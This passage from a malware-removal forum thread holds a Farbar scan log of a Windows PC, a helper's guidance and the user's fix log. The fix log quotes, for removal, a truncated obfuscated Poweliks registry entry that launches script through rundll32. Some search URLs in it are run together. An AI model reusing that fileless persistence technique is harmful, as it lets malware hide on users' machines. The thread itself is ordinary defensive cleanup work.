SearchScopes: HKLM - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
SearchScopes: HKCU - {4FA18F2D-C961-4586-BD6C-A753A39CF7C1} URL = http://search.yahoo.com/search?fr=mcafee&p={SearchTerms}
SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&n=77fd5205&searchfor={searchTerms}
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: No Name -> {9030D464-4C02-4ABF-8ECC-5164760863C6} ->  No File
BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://vpn.harris.com/dana-cached/sc/JuniperSetupClient.cab
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll (McAfee, Inc.)
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL ()
FF Plugin: @mcafee.com/SAFFPlugin -> C:\Program Files\McAfee\SiteAdvisor\npmcffplg32.dll (McAfee, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.1.10329.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor
FF Extension: McAfee SiteAdvisor - C:\Program Files\McAfee\SiteAdvisor [2011-07-30]
FF HKLM\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2012-08-25]

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2013-06-25]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 DDNIMSGService; C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe [171872 2010-07-20] (Digital Delivery Networks, Inc.) [File not signed]
R2 DDNIService; C:\Program Files\DDNI\DIBS\DDNIService.exe [163680 2010-07-23] (Digital Delivery Networks, Inc.) [File not signed]
R2 EpsonCustomerParticipation; C:\Program Files\EPSON\EpsonCustomerParticipation\EPCP.exe [521600 2011-06-09] (SEIKO EPSON CORPORATION)
R2 GoToMyPC; C:\Program Files\Citrix\GoToMyPC\g2svc.exe [1335640 2014-09-04] (Citrix Online, a division of Citrix Systems, Inc.)
R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 MBAMScheduler; C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [145568 2014-04-25] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [472072 2014-06-12] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-07-24] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-06-20] (McAfee, Inc.)
R2 mfevtp; C:\windows\system32\mfevtps.exe [179600 2014-06-20] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)
S3 SophosVirusRemovalTool; C:\Program Files\Sophos\Sophos Virus Removal Tool\SVRTservice.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 cfwids; C:\windows\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)
S3 HipShieldK; C:\windows\System32\drivers\HipShieldK.sys [147912 2013-09-23] (McAfee, Inc.)
S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys [30976 2014-10-20] ()
R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [23256 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [114904 2014-10-26] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [51928 2014-10-01] (Malwarebytes Corporation)
R3 mfeapfk; C:\windows\System32\drivers\mfeapfk.sys [135968 2014-06-20] (McAfee, Inc.)
R3 mfeavfk; C:\windows\System32\drivers\mfeavfk.sys [238176 2014-06-20] (McAfee, Inc.)
S3 mfebopk; C:\windows\System32\drivers\mfebopk.sys [67816 2014-06-20] (McAfee, Inc.)
R3 mfefirek; C:\windows\System32\drivers\mfefirek.sys [369248 2014-06-20] (McAfee, Inc.)
R0 mfehidk; C:\windows\System32\drivers\mfehidk.sys [576048 2014-06-20] (McAfee, Inc.)
R3 mfencbdc; C:\windows\System32\DRIVERS\mfencbdc.sys [349192 2014-07-24] (McAfee, Inc.)
S3 mfencrk; C:\windows\System32\DRIVERS\mfencrk.sys [81296 2014-07-24] (McAfee, Inc.)
R0 mfewfpk; C:\windows\System32\drivers\mfewfpk.sys [217224 2014-06-20] (McAfee, Inc.)
R2 monblanking; C:\windows\System32\DRIVERS\monblanking.sys [29280 2014-09-04] (Citrix Systems, Inc.)
R3 SuperIO; C:\windows\System32\DRIVERS\spio.sys [11720 2009-06-05] ()
R2 WinI2C-DDC; C:\windows\system32\drivers\DDCDrv.sys [16200 2009-03-02] (Nicomsoft Ltd.)
S3 wsvd; C:\windows\System32\DRIVERS\wsvd.sys [81704 2009-07-21] (CyberLink)
U5 AppMgmt; C:\windows\system32\svchost.exe [20992 2009-07-13] (Microsoft Corporation)
S3 esgiguard; \??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys [X]
S3 MFE_RR; \??\C:\Users\Jude\AppData\Local\Temp\mfe_rr.sys [X]
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 21:56 - 2014-10-26 21:57 - 00016768 _____ () C:\Users\Jude\Documents\FRST.txt
2014-10-26 21:56 - 2014-10-26 21:56 - 00000000 ____D () C:\Users\Jude\Documents\FRST-OlderVersion
2014-10-26 18:56 - 2014-10-26 18:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2014-10-26 17:12 - 2014-10-26 17:12 - 00143944 _____ () C:\windows\Minidump\102614-13400-01.dmp
2014-10-24 20:38 - 2014-10-24 20:38 - 16281688 _____ () C:\Users\Jude\Downloads\RogueKiller.exe
2014-10-24 19:30 - 2014-10-26 21:56 - 00000000 ____D () C:\FRST
2014-10-24 19:19 - 2014-10-26 21:56 - 01104896 _____ (Farbar) C:\Users\Jude\Documents\FRST.exe
2014-10-24 19:14 - 2014-10-24 19:14 - 00000197 _____ () C:\windows\system32\2014-10-25-00-14-23.060-AvastVBoxSVC.exe-6096.log
2014-10-23 22:23 - 2014-10-23 22:23 - 00000247 _____ () C:\windows\system32\2014-10-24-03-23-19.088-aswFe.exe-2368.log
2014-10-23 22:15 - 2014-10-23 22:15 - 00000000 ____D () C:\Program Files\Enigma Software Group
2014-10-23 22:14 - 2014-10-24 19:39 - 00000000 ____D () C:\windows\455F074C814E4520B69B5584BD90400C.TMP
2014-10-23 22:14 - 2014-10-23 22:14 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard
2014-10-23 22:11 - 2014-10-23 22:10 - 00728960 _____ (Enigma Software Group USA, LLC.) C:\Users\Jude\Documents\SpyHunter-Installer.exe
2014-10-23 21:06 - 2014-10-23 21:06 - 00000197 _____ () C:\windows\system32\2014-10-24-02-06-00.040-AvastVBoxSVC.exe-9492.log
2014-10-23 20:57 - 2014-10-23 21:01 - 00000000 ____D () C:\AdwCleaner
2014-10-23 20:30 - 2014-10-23 20:30 - 00000000 ____D () C:\windows\system32\vbox
2014-10-23 20:25 - 2014-10-24 19:54 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-10-23 19:40 - 2014-10-23 19:41 - 00000000 ____D () C:\ProgramData\Sophos
2014-10-23 12:36 - 2014-10-23 21:10 - 00000000 ____D () C:\Users\Jude\AppData\Local\CrashDumps
2014-10-22 23:38 - 2014-10-22 23:38 - 00000000 ____D () C:\ProgramData\Sun
2014-10-22 23:37 - 2014-10-22 23:37 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-22 23:07 - 2014-10-22 23:08 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00001989 _____ () C:\Users\Public\Desktop\Adobe Reader XI.lnk
2014-10-22 23:07 - 2014-10-22 23:07 - 00000000 ____D () C:\Program Files\Adobe
2014-10-20 21:34 - 2014-10-20 21:34 - 00000000 ____D () C:\Program Files\ESET
2014-10-20 21:07 - 2014-10-20 21:07 - 00030976 _____ () C:\windows\system32\Drivers\hitmanpro37.sys
2014-10-20 21:07 - 2014-10-20 21:07 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-10-20 20:22 - 2014-10-24 20:39 - 00034808 _____ () C:\windows\system32\Drivers\TrueSight.sys
2014-10-20 20:22 - 2014-10-20 20:22 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-20 20:13 - 2014-10-20 21:55 - 00000000 ____D () C:\windows\erdnt
2014-10-19 09:45 - 2014-10-26 19:25 - 00114904 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-19 09:35 - 2014-10-22 07:05 - 00001060 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-19 09:35 - 2014-10-22 07:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-22 07:05 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-19 09:34 - 2014-10-01 11:11 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-10-19 09:34 - 2014-10-01 11:11 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-10-16 06:01 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-10-16 06:01 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll
2014-10-16 06:01 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll
2014-10-16 06:00 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-10-16 06:00 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-10-16 06:00 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-10-16 06:00 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-10-16 06:00 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-10-16 06:00 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-10-16 06:00 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-10-16 06:00 - 2014-09-18 20:14 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-10-16 06:00 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-10-16 06:00 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-10-16 06:00 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-10-16 06:00 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-10-16 06:00 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-10-16 06:00 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-10-16 06:00 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-10-16 06:00 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-10-16 06:00 - 2014-09-18 19:50 - 00108032 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-10-16 06:00 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-10-16 06:00 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-10-16 06:00 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 06:00 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-10-16 06:00 - 2014-09-18 19:20 - 00677888 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-10-16 06:00 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-10-16 06:00 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-10-16 06:00 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-10-16 06:00 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-10-16 06:00 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-10-16 06:00 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll
2014-10-16 05:59 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\system32\packager.dll
2014-10-16 05:59 - 2014-08-28 20:44 - 02744320 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll
2014-10-16 05:59 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe
2014-10-16 05:59 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll
2014-10-16 05:59 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll
2014-10-16 05:59 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys
2014-10-16 05:59 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys
2014-10-16 05:58 - 2014-08-29 20:50 - 05702656 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll
2014-10-08 16:48 - 2014-10-26 18:42 - 00000000 ___HD () C:\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-09-30 05:40 - 2014-09-30 05:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Citrix

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-26 19:30 - 2012-02-12 13:38 - 00000000 ____D () C:\Program Files\LTCM Client
2014-10-26 19:23 - 2011-04-23 12:56 - 00000000 ____D () C:\Program Files\Coupons
2014-10-26 18:56 - 2012-08-25 09:04 - 00001844 _____ () C:\Users\Public\Desktop\McAfee Internet Security.lnk
2014-10-26 18:49 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-26 18:49 - 2009-07-13 23:34 - 00014240 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-26 18:45 - 2010-05-07 22:53 - 01713117 _____ () C:\windows\WindowsUpdate.log
2014-10-26 18:41 - 2009-07-13 23:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-10-26 18:41 - 2009-07-13 23:39 - 00334395 _____ () C:\windows\setupact.log
2014-10-26 17:12 - 2014-07-05 15:34 - 315846567 _____ () C:\windows\MEMORY.DMP
2014-10-26 17:12 - 2014-07-05 15:34 - 00000000 ____D () C:\windows\Minidump
2014-10-24 19:54 - 2010-05-07 23:24 - 01133766 _____ () C:\windows\PFRO.log
2014-10-23 22:17 - 2010-08-14 11:20 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Skype
2014-10-23 20:13 - 2010-08-13 15:58 - 00000000 ____D () C:\Users\Jude\AppData\Local\VirtualStore
2014-10-22 23:19 - 2011-06-06 11:12 - 00000000 ____D () C:\Users\Jude\AppData\Local\{D76B0B32-AE89-4965-A220-20340E32DB46}
2014-10-22 23:18 - 2013-08-03 08:13 - 00701104 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerApp.exe
2014-10-22 23:18 - 2011-07-30 12:21 - 00071344 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerCPLApp.cpl
2014-10-22 23:17 - 2010-08-29 13:04 - 00000000 ____D () C:\Users\Jude\AppData\Local\Adobe
2014-10-22 23:08 - 2011-07-30 12:19 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-10-22 23:07 - 2010-08-29 13:05 - 00000000 ____D () C:\ProgramData\Adobe
2014-10-20 18:56 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\rescache
2014-10-19 09:35 - 2010-08-29 13:23 - 00000000 ____D () C:\Users\Jude\AppData\Roaming\Malwarebytes
2014-10-19 09:34 - 2010-08-29 13:23 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-16 16:07 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\Microsoft.NET
2014-10-16 09:16 - 2009-07-13 23:33 - 00408160 _____ () C:\windows\system32\FNTCACHE.DAT
2014-10-16 09:08 - 2013-08-03 08:26 - 00000000 ____D () C:\windows\system32\MRT
2014-10-16 09:01 - 2010-12-25 17:37 - 100290944 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-16 07:59 - 2011-09-01 13:39 - 00000000 ____D () C:\Users\Jude\AppData\Local\{1E67DC0C-F6E5-45C4-8408-EB5E04C72A6E}
2014-10-06 11:15 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\system32\NDF
2014-10-01 11:11 - 2013-11-30 09:46 - 00023256 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbam.sys
2014-09-29 07:47 - 2009-07-13 23:53 - 00032632 _____ () C:\windows\Tasks\SCHEDLGU.TXT

Files to move or delete:
====================
C:\ProgramData\flashax10.exe
C:\Users\Jude\gotomypc_540.exe

Some content of TEMP:
====================
C:\Users\Jude\AppData\Local\Temp\catchme.dll
C:\Users\Jude\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Jude\AppData\Local\Temp\ezGameXN.dll
C:\Users\Jude\AppData\Local\Temp\GameXNGO.exe
C:\Users\Jude\AppData\Local\Temp\MSN407.exe
C:\Users\Jude\AppData\Local\Temp\nss6D16.tmp.exe
C:\Users\Jude\AppData\Local\Temp\Quarantine.exe
C:\Users\Jude\AppData\Local\Temp\Refresh.exe
C:\Users\Jude\AppData\Local\Temp\SHSetup.exe
C:\Users\Jude\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Jude\AppData\Local\Temp\sqlite3.dll
C:\Users\Jude\AppData\Local\Temp\sqlite3.exe
C:\Users\Jude\AppData\Local\Temp\vxocslb.dll
C:\Users\Jude\AppData\Local\Temp\_is7D79.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-20 18:48

==================== End Of Log ============================

 

 

 



#6 Gunto

Gunto

    Bleepin' Reject Phoenix


  • Malware Response Team
  • 1,291 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA
  • Local time:06:59 AM

Posted 27 October 2014 - 09:28 AM

Hi,

 

It's great that you managed to remove the Trojan. However, in the future, please don't run any scans (or other programs that affect your system similarly, for that matter) without asking me first. In this case, the results were positive, but sometimes scans can remove malware in such a way that it can damage your system. Even then, it's very difficult to keep up with the current status of your system if you don't tell me you're doing something first, or if you don't tell me at all.

 

Good work on getting rid of those programs.

 

It looks like you didn't run the FRST fix I asked you to, since many things I set to remove in it are still present on your system. Plus, you didn't post Fixlog.txt in your reply, only the new FRST.txt. If you did run the fix, please post the text file. If you didn't, please run the fix and then run a new FRST scan. It's very important that you run the fix first. :)

 

Gunto


Beautiful avatar by Plumbeck!

 

Bury me in honor; when I'm dead and hit the ground, a love back home, it unfolds...


#7 sysadmin74

sysadmin74
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:59 AM

Posted 27 October 2014 - 10:24 AM

My apologies, I had a misunderstanding with the instructions.  Just so I'm clear, do you want me to run the fix first, post the fixlog.txt file in my reply, then run the FRST scan and post the results into the reply?



#8 Gunto

Gunto

    Bleepin' Reject Phoenix


  • Malware Response Team
  • 1,291 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:North Las Vegas, Nevada, USA
  • Local time:06:59 AM

Posted 27 October 2014 - 12:18 PM

Hi,

 

It's fine. :) You can run the fix and then run the new scan and post both at once, or you can post them separately if they're too long to post together (which they shouldn't be). In other words, you've understood me fine, but you're free to post both logs in the same post.

 

Gunto


Beautiful avatar by Plumbeck!

 

Bury me in honor; when I'm dead and hit the ground, a love back home, it unfolds...


#9 sysadmin74

sysadmin74
  • Topic Starter

  • Members
  • 21 posts
  • OFFLINE
  •  
  • Local time:07:59 AM

Posted 28 October 2014 - 05:54 PM

Here's the results from the fixlog file:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 26-10-2014
Ran by Jude at 2014-10-28 17:36:35 Run:1
Running from C:\Users\Jude\Documents
Loaded Profile: Jude (Available profiles: Jude)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
HKLM\...\Run: [] => [X]
HKU\S-1-5-21-4075801609-534856644-2620926182-1004\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.twcc.com/
SearchScopes: HKLM - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = http://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-7337771DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKLM - {cca2e567-1987-4100-a3c6-5b4267084510} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^YK^xdm133^YYA^us&ptb=2BD3AA07-2D59-4339-8431-21121A049947&psa=&ind=2013090309&st=sb&nhttp://search.mywebsearch.com/mywebsearch/GGmain.jhtml?id=UXxdm002YYus&ptnrS=UXxdm002YYus&si=CKDYzOau1a8CFQ0DQAodJ3iwcw&ptb=8294944D-3C7C-4195-81DD-73377=77fd5205&searchfor={searchTerms}
SearchScopes: HKCU - {b0441a0e-a49a-4e16-afc1-74ecced1921f} URL = 71DCA2E&ind=2012042711&n=77ed55d7&psa=&st=sb&searchfor={searchTerms}
